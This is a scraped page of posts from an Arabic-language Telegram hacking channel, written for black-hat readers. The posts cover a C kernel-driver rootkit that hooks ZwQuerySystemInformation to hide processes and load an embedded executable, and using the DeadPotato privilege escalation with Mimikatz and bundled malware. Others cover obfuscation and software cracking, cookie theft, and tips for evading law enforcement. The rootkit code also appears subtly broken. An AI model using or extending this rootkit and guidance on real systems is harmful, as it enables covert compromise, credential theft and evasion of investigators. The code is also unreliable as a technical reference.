RED TEAM CYBERSECURITY-SM🇪🇬
رفتن به کانال در Telegram
Trust no one in the world, no matter what. Here you will learn cybersecurity, development, software, and programming completely free of charge. I don't require any fees except for paid products and courses. Egypt 🔥🇪🇬
نمایش بیشتر1 153
مشترکین
-824 ساعت
+137 روز
+1330 روز
آرشیو پست ها
الكود ده هيتنفذ مباشرة على الصفحة وده معناه إن أي مستخدم يفتح الصفحة دي بعد كده هيتعرض للثغرة اللي ممكن الهاكر يستغلها في سرقة الكوكيز الخاصة بالمستخدم أو تنفيذ أكواد خبيثة تؤدي لسرقة الجلسات أو حتى حقن أكواد ضارة عشان تسرق بيانات تانية أكتر حساسية زي الـ Tokens اللي بتستخدم في الجلسات أو البيانات الشخصية المشكلة في النوع ده من الثغرات إنها بتسبب تهديد حقيقي لأمان التطبيق والمستخدمين وكمان بتعتبر من الثغرات اللي ممكن تستغل بسهولة كبيرة لو المطورين مش بياخدوا بالهم من كيفية التعامل مع المدخلات بطريقة آمنة الحلول الأساسية لتفادي النوع ده من الثغرات بتتمثل في استخدام طرق آمنة لعرض البيانات زي textContent أو التأكد من تطهير المدخلات عن طريق استخدام مكتبات متخصصة لتطهير المدخلات زي DOMPurify اللي بتنضف المدخلات من أي أكواد ضارة وتمنع تنفيذ أي أكواد JavaScript غير مرغوب فيها بالإضافة لإن المطور لازم يكون واعي لفكرة الـ Content Security Policy (CSP) واللي بيسمح للمطور يحدد مصادر الأكواد اللي ممكن تتنفذ على الصفحة ودي بتقلل بشكل كبير احتمالية تنفيذ أي ميليشيوس كودز\n\nوبس والله 😊","datePublished":"2025-05-24T11:05:22Z","dateModified":"2025-05-24T11:05:22Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":16}]}},{"@type":"ListItem","position":2,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1532","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1532","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1532","headline":"السكريبت اللي بنتكلم عنه هنا هو \"DeadPotato\" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الو…","articleBody":"السكريبت اللي بنتكلم عنه هنا هو \"DeadPotato\" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الويندوز تحديدا في سيناريوهات التصعيد للامتيازات أو الـ Privilege Escalation ودي واحدة من أخطر وأهم الخطوات في أي عملية هجوم ناجحة على أي نظام لأنه بمجرد ما المخترق يقدر يرفع مستوى صلاحياته على الجهاز بيبقى ليه سيطرة كاملة على النظام وبيقدر ينفذ أوامر خطيرة ويثبت برامج ضارة أو مالوير ويجمع معلومات حساسة والسكريبت ده مبني على فكرة استغلال ثغرات قديمة في أنظمة ويندوز زي ثغرة الـ RottenPotato أو JuicyPotato واللي بتسمح للمخترق إنه يستخدم صلاحيات الـ SYSTEM أو الـ Administrator على الجهاز المستهدف من خلال التلاعب ببعض البروتوكولات اللي بيستخدمها ويندوز للتواصل بين العمليات الداخلية في النظام زي الـ DCOM والـ RPC اللي هما Distributed Component Object Model وRemote Procedure Call على التوالي.\n\nالـ DeadPotato بيسمح للمهاجم إنه ينفذ كود معين بصلاحيات عالية من غير ما يكون ليه وصول مباشر لصلاحيات الـ SYSTEM في الأول ودي نقطة مهمة جدا لأن معظم العمليات اللي بتحصل على النظام بتكون بصلاحيات محدودة يعني مش كل واحد يستخدم الكمبيوتر أو السيرفر عنده صلاحيات النظام بالكامل وده اللي بيخلي اختراق الأنظمة الحديثة أكتر تعقيدا وأصعب لكن باستخدام DeadPotato بيتمكن المهاجم إنه يستغل حاجة اسمها NTLM Relay Attack علشان يوصل للـ SYSTEM privileges على الجهاز المصاب من غير ما يكون عنده أصلا الوصول المباشر ليها.\n\nبخصوص تصحيح المعلومة وتنسيقها بشكل علمي أكتر خلينا نقول إن استغلال الـ NTLM Relay في DeadPotato بيتم من خلال إرسال طلبات تصديق مزورة للـ NTLM protocol داخل النظام ده بيتم عن طريق خداع الخدمة اللي بتمشي الطلبات دي زي خدمة COM أو DCOM اللي هي أساسا بتمشي طلبات بينها وبين الـ LSASS اللي هي Local Security Authority Subsystem Service المسؤولة عن إدارة سياسات الأمان وعمليات التوثيق في ويندوز واللي بيحصل هنا إن السكريبت بيعمل حاجة اسمها \"Token Impersonation\" واللي بتسمح للمهاجم بأنه يقلد صلاحيات المستخدم الموثق بحيث إنه يقدر ينفذ أي أمر أو ينزل أي برنامج ضار بصلاحيات أعلى بكثير من اللي كان يقدر ينفذها لوحده في الحالة الطبيعية.\n\nلو انت بتهدف إنك تدمج DeadPotato مع مالوير معين علشان تنفذ هجوم شامل وقوي على أنظمة ويندوز لازم تفكر بطريقة البلاك هات اللي هي المخترقين اللي بيستخدموا مهاراتهم لشن هجمات ضارة وإلحاق أذى حقيقي أو سرقة بيانات ومعلومات مالية وحساسة لما تدمر الحماية على النظام باستخدام DeadPotato هتقدر بعد كده تدخل المالوير بتاعك بشكل سلس وبدون ما يتم اكتشافه بسهولة خصوصا لو عملت باندنغ مع سكريبت تاني زي Mimikatz اللي بيتيح لك استخراج التوكينز وكلمات المرور من الذاكرة واللي بيسمح لك أنك تكمل الهجوم بتاعك بشكل أسرع وأنجح وتسيطر على الشبكة كلها.\n\nقوة DeadPotato بتيجي من إنه بيستغل البروتوكولات اللي هي أصلا جزء أساسي من نظام التشغيل وماحدش يقدر يقفلها بسهولة لأن لو قفلتها هتعطل حاجات تانية في السيستم يعني المهاجم بيلعب على حتة حساسة جدا في النظام علشان كده الهجوم بيبقى خطير وصعب الحماية ضده وفي نفس الوقت بيسهل دمج الهجمات دي في مالوير لأنك بتضمن إن مالويرك هيشتغل بصلاحيات عالية وبدون ما يحتاج إنه يكسر حماية كبيرة في البداية.\n\nرابط المشروع على جيت هوب\n\nوبس والله 😊","datePublished":"2025-05-24T11:05:22Z","dateModified":"2025-05-24T11:05:22Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":15}]}},{"@type":"ListItem","position":3,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1531","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1531","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1531","headline":"مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخص…","articleBody":"مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخصصة لتحليل البرمجيات الخبيثة والهندسة العكسية وكمان تطوير أو كسر حماية البرمجيات وهو مشروع بيستهدف بشكل أساسي المهتمين بالأمن السيبراني سواء محترفين أو هاكرز بس لو بنتكلم في سياق البلاك هات فهو يعتبر كنز لأي شخص عايز يعزز مهاراته في تطوير الأدوات أو اختراق الأنظمة لأن المشروع بيوفر بيئة جاهزة للتجربة والتطوير واللي يميزه إنه بيشتغل بشكل عام على ملفات التنفيذ سواء EXE أو DLL وبيساعد على تحليل الكود الخاص بيها وفهم العمليات اللي بتحصل داخل البرامج وخاصة العمليات اللي بتتعامل مع الذاكرة زي Buffer Management أو عمليات التحميل الديناميكي للملفات \n\nالبلاك هات ممكن يستخدم المشروع ده بشكل مباشر في تحليل الثغرات داخل البرمجيات أو الأنظمة المستهدفة لأن الأدوات دي بتوفر وسائل لفهم كيفية تعامل التطبيقات مع المدخلات والبيانات وبكده يقدر الهكر يكتشف أخطاء في الأكواد زي Buffer Overflow أو Heap Exploitation اللي بتظهر لما البرنامج يستقبل بيانات أكتر من حجم الذاكرة المخصص ليها وده بيتيح تنفيذ أكواد ضارة جوه البرنامج المستهدف بالإضافة إلى إن الأدوات دي بتشتغل على مستوى متقدم من الهندسة العكسية وبتساعد الهكر في فك التشفير أو الحماية اللي بتكون موجودة على البرامج زي آليات Licensing Systems أو DRM واللي بتستخدم لحماية البرامج من النسخ أو التعديل \n\nلو الهكر عنده خلفية برمجية قوية ممكن يطوّر الأدوات دي عشان تبقى أكتر تعقيداً وفعالية زي إنه يضيف تقنيات لتعتيم الكود Obfuscation واللي بتساعد على إخفاء البرمجيات الخبيثة من برامج الحماية أو يدمجها مع مكتبات زي Radare2 أو Capstone اللي بتقدم إمكانيات تحليل متقدم للأكواد الثنائية وممكن كمان يضيف إمكانيات لتحليل الشبكات مع البرامج دي باستخدام مكتبات زي Scapy لتحليل حزم البيانات أو إدخال وظائف لتوليد Payloads متطورة تقدر تخترق الأنظمة الحديثة \n\nمن الأفكار اللي ممكن الهكر يدمجها مع المشروع هي إنه يضيف تقنيات استغلال Automated Exploitation عشان يخلي الأدوات بتشتغل تلقائياً على اكتشاف واستغلال الثغرات وممكن كمان يدمج المشروع مع أدوات متطورة زي IDA Pro أو Ghidra لتحليل البرمجيات بشكل أعمق وفك الكود المصدري بشكل أوضح واللي هيتيح للهكر مش بس فهم الكود لكن كمان إعادة بنائه أو تعديله بما يناسب احتياجاته \n\nفي مجال كسر البرامج الأدوات دي بتساعد الهكر في فك حماية البرامج من خلال تحليل الـ Binary Code وإيجاد النقاط اللي فيها عمليات تحقق التراخيص ودي ممكن يتم تجاوزها بسهولة باستخدام تقنيات Patch Based Exploitation اللي بتعدل على الكود الموجود جوه الملف التنفيذي أو إدخال تقنيات مثل Code Injection لإضافة تعليمات برمجية جديدة تخدم الغرض المطلوب وفي مجال اكتشاف الثغرات الأدوات دي ممكن تستخدم لفحص الأماكن اللي بيتم فيها تخصيص الذاكرة جوه التطبيقات وتحليل الـ Stack Frames بشكل يدوي أو تلقائي عشان يكتشف الهكر الأماكن اللي ممكن يحصل فيها تجاوز للذاكرة أو Access Violations ودي أكتر الأماكن اللي بيتم استغلالها في الثغرات الحديثة \n\nالهكر اللي عايز يطور الأدوات دي ممكن كمان يستغل الذكاء الاصطناعي في تحليل الأكواد دي بشكل أسرع ويدمج خوارزميات Machine Learning لتحديد الأماكن اللي ممكن تكون عرضة للاستغلال بشكل تلقائي وكمان ممكن يطور واجهة رسومية للمشروع عشان يبقى سهل الاستخدام حتى للي معندوش خبرة كبيرة في التعامل مع الأدوات التقليدية وأخيراً المشروع يعتبر منصة مفتوحة لأي شخص عايز يتعلم أو يطور في مجال الأمن السيبراني والهندسة العكسية بشرط يكون عنده أساسيات برمجية قوية ومهارات تحليلية\n\nرابط المشروع على جيت هوب","datePublished":"2025-05-24T11:05:22Z","dateModified":"2025-05-24T11:05:22Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":14}]}},{"@type":"ListItem","position":4,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1530","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1530","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1530","headline":"الكود اللي قدامنا ده معمول علشان يعمل درايفر لويندوز يستخدم تقنيات متقدمة زي الـHooking علشان يخفي عمليات معي…","articleBody":"الكود اللي قدامنا ده معمول علشان يعمل درايفر لويندوز يستخدم تقنيات متقدمة زي الـHooking علشان يخفي عمليات معينة شغالة في النظام أو يشغل كود خبيث من الميموري. الطريقة دي معروفة وسط الهكرز باسم الـRootkits وهي واحدة من أخطر وأكتر الحاجات اللي بتتعمل علشان تتجاوز الحماية في الويندوز.\n\nفي البداية الكود بيعرف شوية متغيرات وبيظبط الأساسيات، زي تعريف دالة ZwQuerySystemInformation اللي بتستخدم علشان النظام يجيب معلومات عن كل العمليات الشغالة. لكن هنا الهكر بيغير شغل الدالة دي عن طريق الـHook. بمعنى لما أي حاجة في الويندوز تحاول تنادي الدالة دي، الكود بتاع الهكر يدخل في النص ويعدل على النتيجة اللي بتطلع بحيث يخفي أي عملية هو عايز يخبيها، زي مثلًا لو في فايل تنفيذي (exe) شغال وعايز يخفيه عن الأنظار.\n\nالكود كمان بيستخدم Base64 encoding علشان يخزن فايل تنفيذي (مثلاً مالوير) جوة الكود بشكل مش مباشر. وبعد كده بيستخدم دالة اسمها Base64Decode علشان يفك التشفير ويرجع الفايل ده كداتا في الميموري. هنا الهكر ممكن يطور الفكرة دي أكتر ويشغل الكود ده مباشرة من الميموري من غير ما يكتبه على الهارد، وده بيخلي اكتشافه أصعب لأن معظم برامج الأنتي فيرس بتركز على الملفات اللي مكتوبة على الهارد.\n\nجزء مهم تاني هو دالة HookedZwQuerySystemInformation. هنا الهكر بيعدل على المعلومات اللي بتطلع لما النظام يعرض العمليات الشغالة. الطريقة دي بتسمحله يخفي العملية اللي بتشغل المالوير، وده معناه إن أي أداة مراقبة أو حتى المستخدم نفسه مش هيقدر يشوف العملية دي وكأنها مش موجودة.\n\nأما بالنسبة للأفكار اللي ممكن يضيفها البلاك هات على الكود ده فهي كتير. أول حاجة ممكن يدمج تقنية الـProcess Hollowing، اللي بتشغل كود المالوير جوة عملية عادية زي Notepad.exe علشان يبقى أصعب في اكتشافه. كمان ممكن يضيف تشفير للباينري بحيث لو حد حاول يحلل الكود ما يعرفش يوصل لحاجة بسهولة. وكمان ممكن يحط ميكانيزم للـPersistence بحيث المالوير يرجع يشتغل مع كل إعادة تشغيل للجهاز.\n\nتطوير الكود ده ممكن كمان يشمل دمج دوال تانية زي ZwCreateProcess أو ZwMapViewOfSection لتشغيل الفايل من الميموري مباشرة. ده يخلي المالوير أخطر بكتير لأن تشغيله بيتم بالكامل في الرام من غير ما يسيب أثر واضح على الجهاز. وممكن يضيف كود علشان يعمل Bypass لآليات الحماية الحديثة زي الـPatchGuard اللي في ويندوز.\n\nالفايدة اللي هياخدها البلاك هات من الكود ده إنه مش بس هيخفي عملياته، لكن كمان هيصعب على المحللين والأدوات اكتشاف وجوده في النظام. الكود ممكن يتعدل علشان يبقى أكتر مرونة ويتحط في سيناريوهات تانية زي سرقة الداتا من العمليات الشغالة، أو حتى التلاعب بآليات الحماية اللي في الويندوز.","datePublished":"2025-05-24T11:05:21Z","dateModified":"2025-05-24T11:05:21Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":11}]}},{"@type":"ListItem","position":5,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1529","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1529","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1529","headline":"#include #include // Define the function prototype for ZwQuerySystemInformation typed…","articleBody":"#include \n#include \n// Define the function prototype for ZwQuerySystemInformation\ntypedef NTSTATUS (NTAPI *ZwQuerySystemInformation_t)(\n ULONG SystemInformationClass,\n PVOID SystemInformation,\n ULONG SystemInformationLength,\n PULONG ReturnLength\n);\n// Original system function to query system information\nZwQuerySystemInformation_t OriginalZwQuerySystemInformation = NULL;\n// Base64 string of the executable (you would replace this with your actual base64 string)\nconst char* base64ExeString = \"YOUR_BASE64_STRING_HERE\"; \n// Function to decode Base64 string\nNTSTATUS Base64Decode(const char* base64, PVOID* outBuffer, PULONG outSize) {\n ULONG length = 0;\n UCHAR* decodedData = NULL;\n NTSTATUS status = RtlDecodeBase64String(base64, &length, NULL);\n if (NT_SUCCESS(status)) {\n decodedData = (UCHAR*)ExAllocatePool(NonPagedPool, length);\n if (decodedData) {\n status = RtlDecodeBase64String(base64, &length, decodedData);\n if (NT_SUCCESS(status)) {\n *outBuffer = decodedData;\n *outSize = length;\n } else {\n ExFreePool(decodedData);\n }\n } else {\n status = STATUS_INSUFFICIENT_RESOURCES;\n }\n }\n return status;\n}\n// Function to load the decoded executable into memory\nNTSTATUS LoadExeFromMemory(PVOID buffer, ULONG size) {\n // In a real-world scenario, you would use functions like\n // ZwCreateSection, ZwMapViewOfSection, and ZwCreateProcess\n // to execute the code directly from memory. This part is left\n // abstract as it involves complex kernel-mode operations.\n DbgPrint(\"Loaded executable into memory with size: %d\\n\", size);\n return STATUS_SUCCESS;\n}\n// Hooked ZwQuerySystemInformation to hide the process\nNTSTATUS NTAPI HookedZwQuerySystemInformation(\n ULONG SystemInformationClass,\n PVOID SystemInformation,\n ULONG SystemInformationLength,\n PULONG ReturnLength\n) {\n NTSTATUS status = OriginalZwQuerySystemInformation(\n SystemInformationClass,\n SystemInformation,\n SystemInformationLength,\n ReturnLength\n );\n if (status == STATUS_SUCCESS) {\n SYSTEM_PROCESS_INFORMATION* info = (SYSTEM_PROCESS_INFORMATION*)SystemInformation;\n // Iterate through processes and hide the target process (e.g., \"hidden_process.exe\")\n while (info->NextEntryOffset) {\n if (wcscmp(info->ImageName.Buffer, L\"hidden_process.exe\") == 0) {\n // Skip this process, effectively hiding it\n info->NextEntryOffset = 0;\n }\n info = (SYSTEM_PROCESS_INFORMATION*)((PUCHAR)info + info->NextEntryOffset);\n }\n }\n return status;\n}\n// Driver unload function\nvoid DriverUnload(PDRIVER_OBJECT pDriverObject) {\n // Restore the original system call\n if (OriginalZwQuerySystemInformation) {\n InterlockedExchangePointer(\n (PVOID*)&ZwQuerySystemInformation, \n (PVOID)OriginalZwQuerySystemInformation\n );\n }\n DbgPrint(\"Driver unloaded\\n\");\n}\n// Driver entry function\nNTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {\n PVOID exeBuffer = NULL;\n ULONG exeSize = 0;\n NTSTATUS status = Base64Decode(base64ExeString, &exeBuffer, &exeSize);\n if (NT_SUCCESS(status)) {\n DbgPrint(\"Base64 decoded successfully. Size: %d bytes\\n\", exeSize);\n // Load and execute the decoded executable in memory\n status = LoadExeFromMemory(exeBuffer, exeSize);\n \n if (!NT_SUCCESS(status)) {\n DbgPrint(\"Failed to load executable from memory.\\n\");\n }\n } else {\n DbgPrint(\"Base64 decoding failed. Status: 0x%x\\n\", status);\n }\n\n // Hook the system call for process listing (ZwQuerySystemInformation)\n OriginalZwQuerySystemInformation = (ZwQuerySystemInformation_t)ZwQuerySystemInformation;\n ZwQuerySystemInformation = HookedZwQuerySystemInformation;\n\n pDriverObject->DriverUnload = DriverUnload;\n\n DbgPrint(\"Driver loaded\\n\");\n\n return STATUS_SUCCESS;\n}","datePublished":"2025-05-24T11:05:21Z","dateModified":"2025-05-24T11:05:21Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":16}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1528","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1528","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1528","headline":"التخفي بالنسبة للبلاك هات حاجة أساسية عشان يقدر يشتغل بحرية ومن غير ما يتعقب بسهولة وفيه طرق معروفة زي استخدا…","articleBody":"التخفي بالنسبة للبلاك هات حاجة أساسية عشان يقدر يشتغل بحرية ومن غير ما يتعقب بسهولة وفيه طرق معروفة زي استخدام VPN أو الـTOR لكن في طرق تانية مش أي حد يعرفها وبتعتمد على الإبداع والفهم العميق للتكنولوجيا واحدة من الطرق دي هي استخدام الـMAC Spoofing ودي فكرة إنك تغير الـMAC Address الخاص بالجهاز بتاعك وده لأنه بيبقى زي البصمة الفريدة لأي جهاز فلو حد بيتتبعك أو الشبكة اللي بتدخل عليها بتسجل الـMAC Address بتاعك هتلاقي إنك بمجرد تغيير العنوان ده بتشوش أي محاولة لتتبعك حاجة تانية هي استغلال ضعف البروتوكولات المستخدمة في الشبكات زي الـARP وده ممكن يسمح ليك إنك تعمل MITM Attack وتبقى مراقب الشبكة بالكامل من غير ما حد يعرف إنك موجود كمان فيه استخدام الأدوات اللي بتعدل على الـPackets قبل ما تخرج من جهازك زي Scapy في بايثون بحيث تحط بيانات مزيفة في الـHeaders مثلا تغير الـTTL Value أو الـSource IP بشكل متقدم أكتر حاجة متقدمة هي الـProxy Chains المتطورة اللي بتستخدم سلسلة من الـProxies مع الـObfuscation عشان تخلي مسار البيانات بتاعتك غير واضح وده بيحتاج إنك تفهم كويس ازاي كل بروكسي في السلسلة دي بيتعامل مع الـRequestات بتاعتك النقطة التانية اللي معظم البلاك هات ما يعرفوهاش هي الـFirmware Modification الفكرة إنك تعدل على الـFirmware بتاع الجهاز اللي بتستخدمه سواء كان راوتر أو موبايل بحيث تعمله Customize يحميك أكتر ويمنع تتبعك النقطة اللي بعد كده هي استغلال الأخطاء البرمجية في أنظمة التشغيل زي الـDLL Hijacking أو حتى الـSyscall Hooking ودي طرق بتخليك تغير في طريقة عمل النظام من الجذور وتمنع تسجيل أي نشاط ليك على الجهاز كمان فيه حاجة مهمة جدًا اسمها الـTiming Analysis عشان لو فيه أي محاولة لتتبعك عن طريق الأنماط الزمنية للحركة على الشبكة تقدر تغير فيها باستخدام الـTraffic Shaping اللي بتعدل في توقيت إرسال واستقبال البيانات بحيث تضيع أي محاولة للتحليل ودي مش طرق معقدة لكنها بتحتاج تدريب عشان تقدر تنفذها بكفاءة فيه كمان حركات تانية زي أنك تستغل التشفير الفريد للبيانات اللي بتخرج من جهازك باستخدام تقنيات Steganography عشان تخفي أي معلومات داخل ملفات تانية زي الصور أو الفيديوهات بشكل خفي تمامًا ومش ممكن يتشاف إلا لو حد فاهم التكنولوجيا دي بشكل عميق ده كله بيرجع لقاعدة واحدة وهي إنك دايمًا تكون متقدم خطوة على اللي ممكن يطاردك سواء كان قانون أو أفراد وتعرف تستغل كل ثغرة وكل نقطة ضعف سواء في البرامج أو الأجهزة وحتى العادات البشرية","datePublished":"2025-05-24T11:05:20Z","dateModified":"2025-05-24T11:05:20Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":13}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1527","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1527","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1527","headline":"الكوكيز هي ملفات صغيرة بيتم تخزينها في جهاز المستخدم لما يزور موقع على الإنترنت وبتحتوي على معلومات بتسهل تجر…","articleBody":"الكوكيز هي ملفات صغيرة بيتم تخزينها في جهاز المستخدم لما يزور موقع على الإنترنت وبتحتوي على معلومات بتسهل تجربة التصفح زي اسم المستخدم وكلمة المرور والجلسات المفتوحة والتفضيلات الشخصية وطبيعة النشاط اللي بيعمله المستخدم على الموقع الكوكيز بتتصنف لأنواع كتير وكل نوع له استخدام معين زي الكوكيز المؤقتة ودي بتتخزن في ذاكرة المتصفح وبتتمسح بمجرد ما يقفل المستخدم المتصفح فيه كمان الكوكيز الدائمة اللي بتفضل متخزنة لفترة طويلة وبتساعد المواقع إنها تفتكر المستخدم وتفضيلاته زي ما بتشوف في المواقع اللي بتفتكر بيانات تسجيل الدخول أو العربيات اللي أضفتها لسلة الشراء أما الكوكيز التابعة لطرف ثالث فدي بتتخزن عن طريق إعلانات أو خدمات من مواقع تانية غير الموقع اللي بتزوره زي ما بيحصل في التتبع الإعلاني \n\nالهكرز بيستخدموا تقنيات كتير للحصول على الكوكيز ومنها البرمجيات الخبيثة أو المالوير واللي فعلاً بتعتبر واحدة من الطرق ولكن مش الوحيدة المالوير ممكن يتثبت على جهاز الضحية ويبدأ يسرق الكوكيز اللي مخزنة في المتصفح وده بيساعد الهكر في سرقة الجلسات المفتوحة والدخول على حسابات الضحية بدون ما يحتاج كلمة المرور المالوير أداة قوية ولكن استخدامه معقد وبيحتاج تنفيذ متقن علشان ينجح لكن الهكر مش مضطر يعتمد على المالوير بس فيه تقنيات تانية زي هجمات الـXSS اللي بتستغل ثغرات في المواقع وبتخلي الكوكيز تتسرب للمهاجم من غير ما الضحية يحس الهجوم ده بيتم لما الهكر يحقن كود جافاسكريبت خبيث في صفحة ويب بيتفاعل معاها المستخدم وده الكود بيعمل إرسال للكوكيز للمهاجم \n\nمن الحاجات التانية اللي ممكن الهكر يستخدمها للحصول على الكوكيز هجمات الـMan-in-the-Middle اللي بتعتمد على اعتراض البيانات اللي بتتبعت بين المستخدم والخادم ودي بتشتغل لو الاتصال مش مشفر باستخدام HTTPS لما الهكر يعترض الاتصال يقدر يشوف الكوكيز ويستغلها مباشرة فيه كمان تقنيات الهندسة الاجتماعية اللي بتعتمد على خداع المستخدم لإرسال الكوكيز زي صفحات التصيد اللي بتشبه الموقع الأصلي وتطلب من المستخدم تسجيل الدخول \n\nمهم تفهم إن الكوكيز أداة قوية للتخصيص وتحسين تجربة المستخدم لكنها كمان نقطة ضعف خطيرة لو ما تمش تأمينها كويس عشان كده لازم تستخدم متصفح محدث يدعم البروتوكولات المشفرة زي HTTPS وتفعل ميزة SameSite Attributes اللي بتمنع الكوكيز من التفاعل مع مواقع الطرف الثالث غير الموثوقة","datePublished":"2025-05-24T11:05:20Z","dateModified":"2025-05-24T11:05:20Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":18}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1526","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1526","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1526","headline":"تعديل أسطوانات الويندوز هو عملية تقنية معقدة لكنها من الأساليب الأساسية اللي بيعتمد عليها البلاك هات لتحقيق أ…","articleBody":"تعديل أسطوانات الويندوز هو عملية تقنية معقدة لكنها من الأساليب الأساسية اللي بيعتمد عليها البلاك هات لتحقيق أهدافهم سواء في الاختراق أو التجسس أو حتى التحكم عن بُعد في الأنظمة المصابة وتبدأ العملية بفهم عميق لبنية الويندوز وتقنياته الأساسية لأن ده المفتاح لعمل نسخة معدلة تلبي الاحتياجات الخاصة ليهم أول خطوة بتكون بفك ملفات صورة الويندوز الأصلية (ISO) باستخدام أدوات متخصصة زي PowerISO أو 7-Zip وهنا بيتم استخراج كل ملفات النظام الأساسية زي ملفات الـDLL والـRegistry وملفات البوت زي boot.wim وinstall.wim بعد 